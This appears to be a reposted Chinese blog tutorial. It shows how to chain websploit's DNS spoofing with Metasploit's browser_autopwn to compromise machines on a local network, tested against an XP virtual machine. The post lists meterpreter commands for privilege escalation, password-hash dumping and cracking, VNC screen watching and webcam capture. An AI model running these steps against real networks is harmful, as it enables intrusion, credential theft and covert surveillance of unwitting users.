使用websploit在局域网全自动渗透
原理为 websploit调用dnsdpoof进行dns欺骗配合神器metasploit的web_autopwn模块进行渗透;特点:过程基本全自动。
终端输入websploit打开websploit;输入show modules查看所有模块:
查看到有exploit/browser_autopwn模块和exploit/java_applet模块可以使用(新版metasploit去掉了exploit/autopwn模块);这里以exploit/browser_autopwn模块为例:
设置好之后输入run开始运行,然后就等着鱼儿上钩了(这两个功能完全可以单独手动配置的,这里websploit将其组合了起来):
这是虚拟机里xp测试系统打开网页之后:
getsystem #获取sytem权限
hashdump #抓取账户密码hash值 ,然后用ophcrack破解
run vnc #远程连接,监控屏幕
run webcam -p /var/www/ #监控摄像头
background #不退出此meterpreter并返回msf
。。。
视频:
清晰版视频下载地址:http://pan.baidu.com/s/1o6AYkK6
http://v.youku.com/v_show/id_XNjUxMjM2OTQ0.html
转载于:https://www.cnblogs.com/h4ck0ne/p/5154685.html
使用websploit在局域网全自动渗透相关推荐
- Deep Exploit:结合机器学习的全自动渗透测试工具
Deep Exploit是一款可与Metasploit链接使用,且结合机器学习的全自动渗透测试工具. Deep Exploit有两种模式: 智能模式(Intelligence mode) Deep E ...
- 政企机构用户注意 蠕虫病毒Prometei正在针对局域网横向渗透传播
近日,火绒安全实验室监测到蠕虫病毒"Prometei"正在全网传播.该病毒通过横向渗透攻击方式对局域网中的终端进行大面积入侵,并且可以跨平台(Window.Linux.macOS等 ...
- Yuki Chan全自动渗透测试工具的安装及使用
Yuki Chan是一个自动渗透测试工具,将为您审核所有标准安全评估.它是最好的渗透测试工具之一,它提供许多集成安全工具和执行许多渗透测试操作到目标网络. 已经有超过15个模块与Yuki chan集成 ...
- Kali Linux 安全渗透教程第三更1.2 安全渗透所需工具
了解了渗透测试的概念后,接下来就要学习进行渗透测试所使用的各种工具.在做渗透测试之前,需要先了解渗透所需的工具.渗透测试所需的工具如表1-1所示: 表1-1 渗透所需工具 splint unhide ...
- 带你认识Linux安全渗透,秒懂的那种
什么是安全渗透 渗透测试并没有一个标准的定义.国外一些安全组织达成共识的通用说法是,渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点.技术缺陷 ...
- Kali Linux 安全渗透教程lt;第三更gt;1.2 安全渗透所需工具
了解了渗透測试的概念后,接下来就要学习进行渗透測试所使用的各种工具.在做渗透測试之前,须要先了解渗透所需的工具.渗透測试所需的工具如表1-1所看到的: 表1-1 渗透所需工具 splint unhi ...
- web安全攻防渗透测试笔记
第三章sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量p ...
- 基于kali的一次无线渗透测试
<中华人民共和国刑法> 第二百八十六条 违反国家规定,对计算机信息系统功能进行删除.修改.增加.干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役:后果特别严重的 ...
- web安全攻防渗透测试笔记 (信安一班 李静)
第三章sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量p ...
最新文章
- Linux系统安装gcc/g++详细过程
- Postman 最被低估的功能!
- 第10章 序列的修改、散列和切片
- 基于MATLAB的LDPC编译码仿真,调制为64QAM
- 让前端与后端异步起来
- phoneGap技术分析
- Field+offset(len)
- c#利用反射+特性实现简单的实体映射数据库操作类(表与类的映射)
- ios是否安装了某应用
- Vue-常用加密(MD5,DES,SHA256,BASE64,SHA1,RSA)
- 7月编程排行榜新鲜出炉,再次上演神仙打架!
- 微信智慧支付日系统服务器崩溃,微信支付大面积出现故障 微信支付系统繁忙怎么解决 微信支付崩溃原因是什么...
- 程序 多核优化 linux,linux 多核CPU性能调优
- ANSYS - 表格加载方法
- for循环的几种写法
- Windows Ubuntu 子系统修改默认登陆用户·
- oracle 11g安装过程中问题:移动bin\oralbac11.dll 到bin\oralbac11.dll.dbl出错
- 《CSS禅意花园》明日上市
- npm安装electron时报Error: EPERM: operation not permitted, scandir.....
- Monte Carlo方法的基本思路